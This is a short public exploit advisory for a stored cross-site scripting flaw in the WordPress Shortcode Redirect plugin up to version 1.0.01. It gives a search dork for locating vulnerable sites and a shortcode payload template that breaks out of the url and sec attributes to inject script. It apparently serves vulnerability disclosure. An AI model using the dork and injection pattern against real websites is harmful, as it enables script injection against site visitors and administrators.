# Exploit Title: Wordpress Shortcode Redirect plugin <= 1.0.01 Stored XSS
# Dork: inurl:/wp-content/plugins/shortcode-redirect/
# Date: 2012/01/18
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/shortcode-redirect.1.0.01.zip
# Version: 1.0.01
1) You need permissions to write a post (HTML mode) to exploit the shortcode:
[redirect url='http://wherever.com"[XSS]' sec='500"[XSS]']
WordPress Shortcode Redirect <= 1.0.01 Stored XSS
2012/01/21
Follow me: @gbrindisi